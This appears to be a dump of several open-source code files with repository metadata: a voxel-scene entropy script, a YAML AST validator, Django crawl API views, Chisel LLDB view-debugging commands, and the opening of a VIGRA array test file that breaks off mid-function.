text stringlengths 4 1.02M | meta dict |
|---|---|
# Load the boxm batch-processing bindings and register all available
# processes and datatypes so init_process() can look them up by name.
import boxm_batch;
boxm_batch.register_processes();
boxm_batch.register_datatypes();
class dbvalue:
    """Lightweight handle pairing a batch-database record id with its type name."""

    def __init__(self, index, type):
        # `index` is the unsigned integer id returned by commit_output().
        self.id = index
        # `type` is the datatype name string reported by the batch layer.
        self.type = type
model_dir = "/Users/isa/Experiments/CapitolBOXM_1_1_1"

# --- Load the Gaussian scene description --------------------------------
print("Creating a Scene")
boxm_batch.init_process("boxmCreateSceneProcess")
boxm_batch.set_input_string(0, model_dir + "/gaussf1_scene.xml")
boxm_batch.run_process()
(scene_id, scene_type) = boxm_batch.commit_output(0)
gauss_scene = dbvalue(scene_id, scene_type)

# --- Compute per-voxel entropies over the loaded scene ------------------
print("*************************************")
print("Computing Entropies")
boxm_batch.init_process("boxmComputeEntropyProcess")
boxm_batch.set_input_from_db(0, gauss_scene)
boxm_batch.run_process()
(scene_id, scene_type) = boxm_batch.commit_output(0)
entropy_scene = dbvalue(scene_id, scene_type)

# --- Write the entropy scene out as a raw occupancy volume --------------
print("Save Scene")
boxm_batch.init_process("boxmSaveOccupancyRawProcess")
boxm_batch.set_input_from_db(0, entropy_scene)
boxm_batch.set_input_string(1, model_dir + "/entropy_scene")
boxm_batch.set_input_unsigned(2, 0)
boxm_batch.set_input_unsigned(3, 1)
boxm_batch.run_process()
| {
"content_hash": "7769f584ba88618a640f53a8c299ccec",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 65,
"avg_line_length": 29.05128205128205,
"alnum_prop": 0.7016769638128861,
"repo_name": "mirestrepo/voxels-at-lems",
"id": "2b3d652e120a32fa5eb463bbc462c72595eccaf1",
"size": "1133",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "boxm/compute_entropy.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "1426982"
},
{
"name": "Shell",
"bytes": "360033"
},
{
"name": "TeX",
"bytes": "568"
},
{
"name": "nesC",
"bytes": "374"
}
],
"symlink_target": ""
} |
import collections
import collections.abc
import os
import re
from pprint import pformat

from six import string_types

from simgen.utils.dict_merge import data_merge
from simgen.utils.marked_yaml import marked_load as safe_load, marked_load
# Matches a whole-string template placeholder such as "{{ name }}" and
# captures the identifier as group 'name'.  (A previous, broken draft of
# this regex was kept here as a comment; it has been removed.)
PLACEHOLDER_PATTERN = r'^\s*\{\{\s*(?P<name>\w+)\s*\}\}\s*$'
# Compile once at import time; AstNode.inject() matches this against every
# string-valued property.
_PATTERN = re.compile(PLACEHOLDER_PATTERN)
class NodeTypeSyntaxError(Exception):
    """Raised to tell the user that there is a problem with the node type.

    Attributes:
        message: human-readable description of the problem.
        lineno: 1-based line number within ``source`` (optional).
        name: logical name of the node type (optional).
        filename: path of the file the error was found in (optional).
        source: may be assigned after construction; when set, ``__str__``
            appends file/line context and the offending source line.
    """

    def __init__(self, message, lineno=None, name=None, filename=None):
        self.message = message
        self.lineno = lineno
        self.name = name
        self.filename = filename
        self.source = None
        # Fixed: previously called super(Exception, self), which skipped
        # Exception itself in the MRO; delegate from this class instead.
        super(NodeTypeSyntaxError, self).__init__(message)

    def __str__(self):
        # if the source is set, add the location and the offending line
        if self.source is not None:
            location = 'line %d' % self.lineno
            name = self.filename or self.name
            if name:
                location = 'File "%s", %s' % (name, location)
            lines = [self.message, ' ' + location]
            try:
                line = self.source.splitlines()[self.lineno - 1]
            except IndexError:
                line = None
            if line:
                lines.append(' ' + line.strip())
            return u'\n'.join(lines)
        else:
            return self.message
class AstSyntaxError(Exception):
    """Raised to tell the user that there is a problem with the ast.

    Attributes:
        message: human-readable description of the problem.
        lineno: 1-based line number within ``source`` (optional).
        name: logical name of the node (optional).
        filename: path of the file the error was found in (optional).
        source: may be assigned after construction; when set, ``__str__``
            appends file/line context and the offending source line.
    """

    def __init__(self, message, lineno=None, name=None, filename=None):
        self.message = message
        self.lineno = lineno
        self.name = name
        self.filename = filename
        self.source = None
        # Fixed: previously called super(Exception, self), which skipped
        # Exception itself in the MRO; delegate from this class instead.
        super(AstSyntaxError, self).__init__(message)

    def __str__(self):
        # if the source is set, add the location and the offending line
        if self.source is not None:
            location = 'line %d' % self.lineno
            name = self.filename or self.name
            if name:
                location = 'File "%s", %s' % (name, location)
            lines = [self.message, ' ' + location]
            try:
                line = self.source.splitlines()[self.lineno - 1]
            except IndexError:
                line = None
            if line:
                lines.append(' ' + line.strip())
            return u'\n'.join(lines)
        else:
            return self.message
class NodeType(object):
    """A node-type (concept) description loaded from a mapping or YAML file.

    The mapping must contain a 'name' and a 'properties' field; 'required'
    is optional.  When constructed from a file, the file's base name must
    agree with the mapping's 'name' attribute.
    """

    def __init__(self, mapping=None, file_name=None, loader=None, concept_path=None):
        """Build from an in-memory `mapping`, or load `file_name` via `loader`.

        Raises IOError when the concept file cannot be found, and
        NodeTypeSyntaxError on name mismatch or missing mandatory fields.
        """
        assert loader is not None
        self.loader = loader
        # None-default avoids the shared mutable-default-argument pitfall;
        # passing a list explicitly still works as before.
        self.concept_path = [] if concept_path is None else concept_path
        if mapping:
            self.file_name = file_name
            self.mapping = mapping
        else:
            assert isinstance(file_name, string_types)
            extensions = ['', '.yml', '.yaml']
            fn = self.loader.find_file(file_name, self.concept_path, extensions)
            if not fn:
                raise IOError('Cannot find concept file {} in concept path {} (local path:{})'.format("{}[{}]".format(file_name, '|'.join(extensions)), self.concept_path, self.loader.mixed_to_local_path(self.concept_path)))
            with open(fn, 'r') as f:
                mapping = marked_load(f)
            # the concept's name is the file's base name without extension
            nodetype_name = os.path.basename(fn)
            nodetype_name = nodetype_name.split('.')[0]
            if 'name' in mapping:
                if mapping['name'] != nodetype_name:
                    raise NodeTypeSyntaxError("Name attribute does not match file name: {} != {}".format(mapping['name'], nodetype_name), filename=fn)
            else:
                mapping['name'] = nodetype_name
            self.file_name = fn
            self.mapping = mapping
        # sanity/syntax check.  Fixed: report self.file_name -- the mapping
        # has no 'file_name' key, so the old self.mapping['file_name'] raised
        # KeyError instead of the intended syntax error.
        if 'name' not in self.mapping:
            raise NodeTypeSyntaxError("Missing 'name' field", filename=self.file_name)
        if 'properties' not in self.mapping:
            raise NodeTypeSyntaxError("Missing 'properties' field", filename=self.file_name)

    @property
    def name(self):
        """The node type's name."""
        return self.mapping['name']

    @property
    def properties(self):
        """Iterable of declared property names."""
        return self.mapping['properties'].keys()

    @property
    def required_properties(self):
        """List of property names that instances must supply (may be empty)."""
        if 'required' not in self.mapping:
            return []
        else:
            return self.mapping['required']

    def default(self, p):
        """Get the default value for property p"""
        return self.mapping['properties'][p]['default']

    def get_property_type(self, p):
        """Get the declared type (or list of types) of property p"""
        return self.mapping['properties'][p]['type']

    def get_property_items_type(self, p):
        """Get the allowed item type(s) of list property p, or None."""
        if 'items' in self.mapping['properties'][p]:
            return self.mapping['properties'][p]['items']
        else:
            return None
class AstNode(object):
    """One node of the simgen AST: a single-rooted mapping loaded from YAML.

    The mapping has exactly one top-level key (the node-type name) whose
    value is a dict of property-name -> value.  Values may be nested nodes,
    lists, or '{{ placeholder }}' strings that inject() later substitutes.
    """

    def __init__(self, mapping=None, file_name=None, loader=None, code_path=None, concept_path=None, **kwargs):
        """Build from an in-memory `mapping`, or load `file_name` via `loader`.

        Raises IOError when the file cannot be found, and AstSyntaxError
        when the mapping does not have exactly one root element.
        """
        assert loader is not None
        self.loader = loader
        # None-defaults avoid the shared mutable-default-argument pitfall;
        # explicit list arguments still behave as before.
        self.code_path = [] if code_path is None else code_path
        self.concept_path = [] if concept_path is None else concept_path
        if mapping:
            self.file_name = file_name
            self.mapping = mapping
        else:
            assert isinstance(file_name, string_types)
            extensions = ['', '.yml', '.yaml']
            fn = self.loader.find_file(file_name, self.code_path, extensions)
            if not fn:
                raise IOError('Cannot find Ast file {} in code path {} (local path:{})'.format("{}[{}]".format(file_name, '|'.join(extensions)), self.code_path, self.loader.mixed_to_local_path(self.code_path)))
            with open(fn, 'r') as f:
                mapping = safe_load(f)
            self.file_name = fn
            self.mapping = mapping
        # len() suffices; the old sum(1 for _ in keys()) was an O(n) detour.
        if len(self.mapping) != 1:
            raise AstSyntaxError('Ast node must have exactly one root element', filename=self.file_name, lineno=1)

    @property
    def nodetype_name(self):
        """Name of this node's type: the mapping's single root key."""
        # There should only ever be one key.
        for key in self.mapping.keys():
            return key

    @property
    def properties(self):
        """Iterable of this node's property names."""
        return self.mapping[self.nodetype_name].keys()

    def set_property(self, n, v):
        """Set property `n` to value `v`."""
        self.mapping[self.nodetype_name][n] = v

    def get_property(self, n):
        """Return the value of property `n`."""
        return self.mapping[self.nodetype_name][n]

    def merge(self, dict_to_merge):
        """Deep-merge `dict_to_merge` into this node's mapping."""
        self.mapping = data_merge(self.mapping, dict_to_merge)

    def is_instance(self, value, typename_list, listitem_typesnames=None):
        """Check if the type of a value matches at least one type in typename_list.

        Supports the primitive names 'object', 'integer', 'number',
        'boolean', 'string' and 'list' (with optional item types in
        `listitem_typesnames`), plus user-defined node types (a dict whose
        root key is the type name).
        """
        for typename in typename_list:
            # check primitive types
            if ((typename == 'object') or
                (typename == 'integer' and isinstance(value, int)) or
                (typename == 'number' and isinstance(value, (int, float))) or
                (typename == 'boolean' and isinstance(value, bool)) or
                (typename == 'string' and isinstance(value, string_types))
               ):
                return True
            # check user defined types
            elif isinstance(value, dict) and typename in value:
                return True
            # collections.abc.Iterable: the collections.Iterable alias was
            # removed in Python 3.10.
            elif typename == 'list' and isinstance(value, collections.abc.Iterable):
                if not listitem_typesnames:
                    # untyped list
                    return True
                # typed list: every item must match one of the item types
                if all(self.is_instance(v, listitem_typesnames) for v in value):
                    return True
        return False

    def _child(self, mapping):
        """Build a child AstNode sharing this node's loader, paths and file."""
        return AstNode(mapping=mapping, loader=self.loader, code_path=self.code_path, concept_path=self.concept_path, file_name=self.file_name)

    def validate(self):
        """Type-check this node against its NodeType and recurse into children.

        Loads the node-type description, checks required properties, injects
        declared defaults for missing ones, verifies every property value's
        type (placeholders are skipped), and validates nested nodes.
        Raises AstSyntaxError on any violation; returns True otherwise.
        """
        self.nodetype = NodeType(file_name=self.nodetype_name, loader=self.loader, concept_path=self.concept_path)
        # check existence of required attrs
        for req_property_name in self.nodetype.required_properties:
            if req_property_name not in self.properties:
                # Fixed: self.mapping is a dict with no .file_name attribute;
                # report the node's own file name instead.
                raise AstSyntaxError("Ast node does not have required attribute {}".format(req_property_name), filename=self.file_name, lineno=1)
        # inject defaults
        for property_name in self.nodetype.properties:
            if property_name not in self.properties:
                self.set_property(property_name, self.nodetype.default(property_name))
        # type check
        for property_name in self.properties:
            value = self.get_property(property_name)
            # skip '{{ placeholder }}' values (same pattern inject() uses)
            if isinstance(value, string_types) and _PATTERN.match(value):
                continue
            # the allowed types (one or more) for the given parameter
            typename_list = self.nodetype.get_property_type(property_name)
            # allowed item types when typename_list contains a list type
            listitem_typenames = self.nodetype.get_property_items_type(property_name)
            if not isinstance(typename_list, list):
                typename_list = [typename_list]
            if not self.is_instance(value, typename_list, listitem_typenames):
                raise AstSyntaxError('Type of parameter {} is not {}, but {}'.format(property_name, typename_list, type(value)), filename=self.file_name, lineno=property_name.start_mark.line)
        # recurse into child nodes
        for property_name in self.properties:
            value = self.get_property(property_name)
            # recurse if it's a dict
            if isinstance(value, dict):
                self._child(value).validate()
            # recurse if it's a list containing dicts
            if isinstance(value, collections.abc.Iterable):
                for list_item in value:
                    if isinstance(list_item, dict):
                        self._child(list_item).validate()
        return True

    def inject(self, mapping):
        """Replace '{{ name }}' placeholder values from `mapping`, recursively.

        Placeholders whose name is missing from `mapping` are left untouched.
        """
        for property_name in self.properties:
            value = self.get_property(property_name)
            # check if value is a placeholder, in the format of '{{ placeholder_name }}'
            if isinstance(value, string_types):
                result = _PATTERN.match(value)
                if result and result.group('name') in mapping:
                    self.set_property(property_name, mapping[result.group('name')])
            # recurse if value is a dict
            if isinstance(value, dict):
                self._child(value).inject(mapping)
            # if the value is a list, try recursing into the items
            if isinstance(value, collections.abc.Iterable):
                for list_item in value:
                    if isinstance(list_item, dict):
                        self._child(list_item).inject(mapping)

    def __repr__(self):
        return "AstNode(nodetype.name={}, ast={})".format(self.nodetype_name, pformat(self.mapping))
| {
"content_hash": "b333b1cfb50aa28f1d0634bcefcc33d6",
"timestamp": "",
"source": "github",
"line_count": 315,
"max_line_length": 223,
"avg_line_length": 39.231746031746034,
"alnum_prop": 0.5547014079948211,
"repo_name": "iModels/simgen",
"id": "0ca07daec7d654d0fef0f7e93524663501c999e3",
"size": "12358",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "simgen/astnode.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2030"
},
{
"name": "HTML",
"bytes": "6713"
},
{
"name": "JavaScript",
"bytes": "2025"
},
{
"name": "Jupyter Notebook",
"bytes": "1905"
},
{
"name": "PowerShell",
"bytes": "3113"
},
{
"name": "Python",
"bytes": "56348"
},
{
"name": "Shell",
"bytes": "1952"
}
],
"symlink_target": ""
} |
from django.http import HttpResponse
from django.core.paginator import Paginator
from django.views.decorators.csrf import csrf_exempt
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
from crawl.models import Crawl, PageReference
from crawl.serializers import CrawlSerializer, PageReferenceSerializer
class JSONResponse(HttpResponse):
    """HttpResponse whose body is the JSON rendering of ``data``."""

    def __init__(self, data, **kwargs):
        rendered = JSONRenderer().render(data)
        # Always serve as JSON, regardless of what the caller passed.
        kwargs['content_type'] = 'application/json'
        super(JSONResponse, self).__init__(rendered, **kwargs)
@csrf_exempt
def crawl_list(request):
    """List all crawls (GET) or create a new crawl from JSON (POST)."""
    if request.method == 'GET':
        queryset = Crawl.objects.all()
        return JSONResponse(CrawlSerializer(queryset, many=True).data)
    elif request.method == 'POST':
        serializer = CrawlSerializer(data=JSONParser().parse(request))
        if serializer.is_valid():
            serializer.save()
            return JSONResponse(serializer.data, status=201)
        return JSONResponse(serializer.errors, status=400)
@csrf_exempt
def crawl_detail(request, pk):
    """Retrieve (GET), update (PUT) or delete (DELETE) a single Crawl.

    Returns 404 when the Crawl does not exist, 400 when PUT data is
    invalid, and 204 after a successful delete.
    """
    try:
        crawl = Crawl.objects.get(pk=pk)
    except Crawl.DoesNotExist:
        return HttpResponse(status=404)
    if request.method == 'GET':
        serializer = CrawlSerializer(crawl)
        return JSONResponse(serializer.data)
    elif request.method == 'PUT':
        data = JSONParser().parse(request)
        serializer = CrawlSerializer(crawl, data=data)
        if serializer.is_valid():
            serializer.save()
            return JSONResponse(serializer.data)
        # Fixed: validation failure is a client error (400), not 404;
        # this also matches crawl_list's POST handling.
        return JSONResponse(serializer.errors, status=400)
    elif request.method == 'DELETE':
        crawl.delete()
        return HttpResponse(status=204)
@csrf_exempt
def page_reference(request):
    """Return the first 10 PageReference records as JSON (CORS-enabled)."""
    if request.method == 'GET':
        queryset = PageReference.objects.all()
        # NOTE(review): the page number is hard-coded to 1; presumably a
        # 'page' query parameter was intended eventually.
        first_page = Paginator(queryset, 10).page(1)
        serializer = PageReferenceSerializer(first_page, many=True)
        response = JSONResponse(serializer.data)
        response['Access-Control-Allow-Origin'] = '*'
        return response
| {
"content_hash": "d12b3bc75b3ba25c52853d48ba7e6e53",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 70,
"avg_line_length": 34.5,
"alnum_prop": 0.6774193548387096,
"repo_name": "ethan-lau/mars",
"id": "84b4fe55e82984a9c7151fcd114efa4b996d33cc",
"size": "2139",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web_module/crawl/views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "570"
},
{
"name": "HTML",
"bytes": "1277"
},
{
"name": "JavaScript",
"bytes": "6854"
},
{
"name": "Python",
"bytes": "20761"
},
{
"name": "Shell",
"bytes": "109"
}
],
"symlink_target": ""
} |
import fbchisellldbbase as fb
import fbchisellldbobjcruntimehelpers as runtimeHelpers
import fbchisellldbviewcontrollerhelpers as viewControllerHelpers
import fbchisellldbviewhelpers as viewHelpers
import lldb
def lldbcommands():
    """Entry point Chisel uses to collect this module's command objects."""
    command_classes = [
        FBCoreAnimationFlushCommand,
        FBDrawBorderCommand,
        FBRemoveBorderCommand,
        FBMaskViewCommand,
        FBUnmaskViewCommand,
        FBShowViewCommand,
        FBHideViewCommand,
        FBPresentViewControllerCommand,
        FBDismissViewControllerCommand,
        FBSlowAnimationCommand,
        FBUnslowAnimationCommand,
    ]
    return [command() for command in command_classes]
class FBDrawBorderCommand(fb.FBCommand):
    """Implements the 'border' command: draw colored borders on views/layers."""

    # Palette cycled through when bordering recursively (one color per
    # subview depth level; see run()).
    colors = [
        "black",
        "gray",
        "red",
        "green",
        "blue",
        "cyan",
        "yellow",
        "magenta",
        "orange",
        "purple",
        "brown",
    ]

    def name(self):
        return "border"

    def description(self):
        return "Draws a border around <viewOrLayer>. Color and width can be optionally provided. Additionally depth can be provided in order to recursively border subviews."

    def args(self):
        return [
            fb.FBCommandArgument(
                arg="viewOrLayer",
                type="UIView/NSView/CALayer *",
                help="The view/layer to border. NSViews must be layer-backed.",
            )
        ]

    def options(self):
        return [
            fb.FBCommandArgument(
                short="-c",
                long="--color",
                arg="color",
                type="string",
                default="red",
                help="A color name such as 'red', 'green', 'magenta', etc.",
            ),
            fb.FBCommandArgument(
                short="-w",
                long="--width",
                arg="width",
                type="CGFloat",
                default=2.0,
                help="Desired width of border.",
            ),
            fb.FBCommandArgument(
                short="-d",
                long="--depth",
                arg="depth",
                type="int",
                default=0,
                help="Number of levels of subviews to border. Each level gets a different color beginning with the provided or default color",
            ),
        ]

    def run(self, args, options):
        # Set border width and color on a CALayer by evaluating Objective-C
        # expressions inside the debugged process.
        def setBorder(layer, width, color, colorClass):
            fb.evaluateEffect("[%s setBorderWidth:(CGFloat)%s]" % (layer, width))
            fb.evaluateEffect(
                "[%s setBorderColor:(CGColorRef)[(id)[%s %sColor] CGColor]]"
                % (layer, colorClass, color)
            )

        obj = fb.evaluateInputExpression(args[0])
        depth = int(options.depth)
        isMac = runtimeHelpers.isMacintoshArch()
        color = options.color
        assert color in self.colors, "Color must be one of the following: {}".format(
            " ".join(self.colors)
        )
        # UIColor on iOS, NSColor on macOS.
        colorClassName = "UIColor"
        if isMac:
            colorClassName = "NSColor"
        if viewHelpers.isView(obj):
            prevLevel = 0
            for view, level in viewHelpers.subviewsOfView(obj):
                # subviews are visited with their depth; stop past the limit
                if level > depth:
                    break
                # advance to the next palette color on each new depth level
                if prevLevel != level:
                    color = self.nextColorAfterColor(color)
                    prevLevel = level
                layer = viewHelpers.convertToLayer(view)
                setBorder(layer, options.width, color, colorClassName)
        else:
            # `obj` is not a view, make sure recursive bordering is not requested
            assert (
                depth <= 0
            ), "Recursive bordering is only supported for UIViews or NSViews"
            layer = viewHelpers.convertToLayer(obj)
            setBorder(layer, options.width, color, colorClassName)
        # flush Core Animation so the border shows up immediately
        lldb.debugger.HandleCommand("caflush")

    def nextColorAfterColor(self, color):
        """Return the palette color following `color`, wrapping around."""
        assert color in self.colors, "{} is not a supported color".format(color)
        return self.colors[(self.colors.index(color) + 1) % len(self.colors)]
class FBRemoveBorderCommand(fb.FBCommand):
    """Implements 'unborder': clears layer borders, optionally recursively."""

    def name(self):
        return "unborder"

    def description(self):
        return "Removes border around <viewOrLayer>."

    def options(self):
        depthOption = fb.FBCommandArgument(
            short="-d",
            long="--depth",
            arg="depth",
            type="int",
            default=0,
            help="Number of levels of subviews to unborder.",
        )
        return [depthOption]

    def args(self):
        target = fb.FBCommandArgument(
            arg="viewOrLayer",
            type="UIView/NSView/CALayer *",
            help="The view/layer to unborder.",
        )
        return [target]

    def run(self, args, options):
        # A zero border width effectively removes the border.
        def setUnborder(layer):
            fb.evaluateEffect("[%s setBorderWidth:(CGFloat)%s]" % (layer, 0))

        target = args[0]
        maxDepth = int(options.depth)
        if viewHelpers.isView(target):
            for subview, level in viewHelpers.subviewsOfView(target):
                if level > maxDepth:
                    break
                setUnborder(viewHelpers.convertToLayer(subview))
        else:
            # target is not a view, make sure recursive unbordering is not requested
            assert (
                maxDepth <= 0
            ), "Recursive unbordering is only supported for UIViews or NSViews"
            setUnborder(viewHelpers.convertToLayer(target))
        # repaint so the change is visible immediately
        lldb.debugger.HandleCommand("caflush")
class FBMaskViewCommand(fb.FBCommand):
    """Implements 'mask': overlay a translucent rectangle over a view/layer."""

    def name(self):
        return "mask"

    def description(self):
        return "Add a transparent rectangle to the window to reveal a possibly obscured or hidden view or layer's bounds"

    def args(self):
        target = fb.FBCommandArgument(
            arg="viewOrLayer",
            type="UIView/NSView/CALayer *",
            help="The view/layer to mask.",
        )
        return [target]

    def options(self):
        colorOption = fb.FBCommandArgument(
            short="-c",
            long="--color",
            arg="color",
            type="string",
            default="red",
            help="A color name such as 'red', 'green', 'magenta', etc.",
        )
        alphaOption = fb.FBCommandArgument(
            short="-a",
            long="--alpha",
            arg="alpha",
            type="CGFloat",
            default=0.5,
            help="Desired alpha of mask.",
        )
        return [colorOption, alphaOption]

    def run(self, args, options):
        target = fb.evaluateObjectExpression(args[0])
        viewHelpers.maskView(target, options.color, options.alpha)
class FBUnmaskViewCommand(fb.FBCommand):
    """Implements 'unmask': remove a mask added by the 'mask' command."""

    def name(self):
        return "unmask"

    def description(self):
        return "Remove mask from a view or layer"

    def args(self):
        target = fb.FBCommandArgument(
            arg="viewOrLayer",
            type="UIView/CALayer *",
            help="The view/layer to mask.",
        )
        return [target]

    def run(self, args, options):
        target = fb.evaluateObjectExpression(args[0])
        viewHelpers.unmaskView(target)
class FBCoreAnimationFlushCommand(fb.FBCommand):
    """Implements 'caflush': force a Core Animation transaction flush."""

    def name(self):
        return "caflush"

    def description(self):
        return "Force Core Animation to flush. This will 'repaint' the UI but also may mess with ongoing animations."

    def run(self, arguments, options):
        viewHelpers.flushCoreAnimationTransaction()
class FBShowViewCommand(fb.FBCommand):
    """Implements 'show': unhide a view or layer."""

    def name(self):
        return "show"

    def description(self):
        return "Show a view or layer."

    def args(self):
        target = fb.FBCommandArgument(
            arg="viewOrLayer",
            type="UIView/NSView/CALayer *",
            help="The view/layer to show.",
        )
        return [target]

    def run(self, args, options):
        target = args[0]
        viewHelpers.setViewHidden(target, False)
class FBHideViewCommand(fb.FBCommand):
    """Implements 'hide': hide a view or layer."""

    def name(self):
        return "hide"

    def description(self):
        return "Hide a view or layer."

    def args(self):
        target = fb.FBCommandArgument(
            arg="viewOrLayer",
            type="UIView/NSView/CALayer *",
            help="The view/layer to hide.",
        )
        return [target]

    def run(self, args, options):
        target = args[0]
        viewHelpers.setViewHidden(target, True)
class FBPresentViewControllerCommand(fb.FBCommand):
    """Implements 'present': present a view controller in the debugged app."""

    def name(self):
        return "present"

    def description(self):
        return "Present a view controller."

    def args(self):
        controller = fb.FBCommandArgument(
            arg="viewController",
            type="UIViewController *",
            help="The view controller to present.",
        )
        return [controller]

    def run(self, args, option):
        viewControllerHelpers.presentViewController(args[0])
class FBDismissViewControllerCommand(fb.FBCommand):
    """Implements 'dismiss': dismiss a presented view controller."""

    def name(self):
        return "dismiss"

    def description(self):
        return "Dismiss a presented view controller."

    def args(self):
        controller = fb.FBCommandArgument(
            arg="viewController",
            type="UIViewController *",
            help="The view controller to dismiss.",
        )
        return [controller]

    def run(self, args, option):
        viewControllerHelpers.dismissViewController(args[0])
class FBSlowAnimationCommand(fb.FBCommand):
    """Implements 'slowanim': scale down the animation speed."""

    def name(self):
        return "slowanim"

    def description(self):
        return "Slows down animations. Works on the iOS Simulator and a device."

    def args(self):
        speedArg = fb.FBCommandArgument(
            arg="speed",
            type="float",
            default=0.1,
            help="Animation speed (default 0.1).",
        )
        return [speedArg]

    def run(self, args, option):
        viewHelpers.slowAnimation(args[0])
class FBUnslowAnimationCommand(fb.FBCommand):
    """Implements 'unslowanim': turn slow animations back off."""

    def name(self):
        return "unslowanim"

    def description(self):
        return "Turn off slow animations."

    def run(self, args, option):
        # Called with no argument -- presumably the helper's default speed
        # restores normal animation; see viewHelpers.slowAnimation.
        viewHelpers.slowAnimation()
| {
"content_hash": "025cb1356de1aa1e3175649f69776ee5",
"timestamp": "",
"source": "github",
"line_count": 359,
"max_line_length": 173,
"avg_line_length": 28.779944289693592,
"alnum_prop": 0.5429732868757259,
"repo_name": "facebook/chisel",
"id": "5902ba95e3b1511c47795154cd6cb051e4d2d03d",
"size": "10549",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "commands/FBDisplayCommands.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1962"
},
{
"name": "C++",
"bytes": "1876"
},
{
"name": "Makefile",
"bytes": "321"
},
{
"name": "Objective-C",
"bytes": "5139"
},
{
"name": "Objective-C++",
"bytes": "11455"
},
{
"name": "Python",
"bytes": "208307"
}
],
"symlink_target": ""
} |
#######################################################################
#
# Copyright 2009-2010 by Ullrich Koethe
#
# This file is part of the VIGRA computer vision library.
# The VIGRA Website is
# http://hci.iwr.uni-heidelberg.de/vigra/
# Please direct questions, bug reports, and contributions to
# ullrich.koethe@iwr.uni-heidelberg.de or
# vigra@informatik.uni-hamburg.de
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
#######################################################################
# run with a simple 'nosetests' in this directory
# (and nose installed, i.e. 'easy_install nose')
from __future__ import division, print_function
from functools import reduce
import sys
# Announce which test file is running on stderr (tests are driven by nose).
print("\nexecuting test file", __file__, file=sys.stderr)
# Execute set_paths.py in this namespace (it adjusts the module search path
# for the vigra test modules).  Fixed: use a with-block so the file handle
# is closed deterministically; open(...).read() leaked it until GC.
with open('set_paths.py', "rb") as _set_paths_file:
    _set_paths_code = _set_paths_file.read()
exec(compile(_set_paths_code, 'set_paths.py', 'exec'))
# import vigra # FIXME: without this line, C++ constructors don't find VigraArray
import vigra.arraytypes as arraytypes
import vigra.ufunc as ufunc
import numpy, copy
import vigranumpytest as vt
from nose.tools import assert_equal, raises, assert_true
from vigra.arraytypes import AxisTags, AxisInfo
if sys.version_info[0] > 2:
    # Python 3: provide the Python-2 names this test file uses throughout.
    def xrange(*args):
        return range(*args)

    def iteritems(dictionary, **kwargs):
        return dictionary.items(**kwargs)
else:
    # Python 2: delegate to the lazy iterator variant.
    def iteritems(dictionary, **kwargs):
        return dictionary.iteritems(**kwargs)
# Flag derived from the numpy version string; presumably numpy 1.0 had a
# complex-negation bug that some tests must work around -- TODO confirm.
numpyHasComplexNegateBug = numpy.version.version.startswith('1.0')

# Call vt.testAny() with no arguments and record the type of whatever it
# raises; the bindings' argument-error type is not importable directly, so
# it is captured here for use in checkFailure() below.
try:
    vt.testAny()
except Exception as e:
    ArgumentError = type(e)
# Collect the names of all test entry points exported by vigranumpytest.
# (Iterate names only; the previous loop also fetched the unused values.)
allTests = {n for n in vt.__dict__ if n.startswith('test')}
def checkShape(shape1, shape2):
    """Assert that two shape tuples are identical."""
    assert_equal(shape1, shape2)
def checkStride(stride1, stride2):
    """Assert that two stride tuples are identical."""
    assert_equal(stride1, stride2)
def computeFStrides(shape):
    """Return Fortran-order element strides for `shape`: (1, s0, s0*s1, ...)."""
    shifted = (1,) + shape[:-1]
    return tuple(numpy.cumprod(shifted))
def computeCStrides(shape):
    """Return C-order element strides (row-major mirror of the F-order ones)."""
    mirrored = computeFStrides(tuple(reversed(shape)))
    return tuple(reversed(mirrored))
def computeVStrides(shape, hasChannelAxis):
    """Return VIGRA-order strides: F-order, but with the channel axis (the
    last one) packed densest when `hasChannelAxis` is set."""
    if not hasChannelAxis:
        return computeFStrides(shape)
    rotated = computeFStrides(shape[-1:] + shape[:-1])
    return rotated[1:] + rotated[0:1]
def checkArray(cls, channels, dim, hasChannelAxis=True):
    """Exercise construction, memory layout, axistags, copies and views of
    the VigraArray subclass `cls`.

    cls            -- the array class under test (dtype float32, asserted below)
    channels       -- number of channels the class carries
    dim            -- number of spatial dimensions (2 or 3)
    hasChannelAxis -- whether the class exposes an explicit channel axis
    """
    def testCopy(img):
        # Copies (constructor with order='A' and copy(order='A')) must
        # preserve class, shape, strides, order and contiguity flags,
        # compare equal, and must not share memory with the source.
        b = cls(img, order='A')
        # getrefcount's own argument accounts for one of the two references
        assert_equal(sys.getrefcount(b), 2)
        assert b.__class__ is img.__class__
        assert_equal(b.shape, img.shape)
        assert_equal(b.strides, img.strides)
        assert_equal(b.order, img.order)
        assert_equal(b.flags.c_contiguous, img.flags.c_contiguous)
        assert_equal(b.flags.f_contiguous, img.flags.f_contiguous)
        assert (b == img).all()
        assert not numpy.may_share_memory(b, img)
        b = img.copy(order='A')
